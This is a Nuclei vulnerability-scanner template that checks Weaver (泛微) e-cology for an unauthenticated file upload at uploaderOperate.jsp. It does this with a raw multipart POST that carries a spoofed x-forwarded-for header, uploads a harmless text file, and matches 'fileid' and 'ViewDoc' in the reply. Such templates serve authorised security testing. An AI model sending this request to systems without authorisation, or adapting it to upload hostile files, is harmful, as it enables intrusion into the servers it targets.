id: fanwei_uploadOperation_upload

info:
  name: 泛微uploadOperation上传
  author: str1am
  severity: high
  tags: fanwei

requests:
  - raw:
      - |
        POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 393
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
        Origin: null
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Cookie:ecology_JSessionid=aaag7nFjytVam_jBO0O4x;
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
        dnt: 1
        x-forwarded-for: 127.0.0.1
        Connection: close

        ------WebKitFormBoundary6XgyjB6SeCArD3Hc
        Content-Disposition: form-data; name="secId"

        1
        ------WebKitFormBoundary6XgyjB6SeCArD3Hc
        Content-Disposition: form-data; name="Filedata"; filename="000.txt"
        Content-Type: application/octet-stream

        123
        ------WebKitFormBoundary6XgyjB6SeCArD3Hc
        Content-Disposition: form-data; name="plandetailid"

        1
        ------WebKitFormBoundary6XgyjB6SeCArD3Hc--


    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "fileid"
          - "ViewDoc"
        part: body
        condition: and
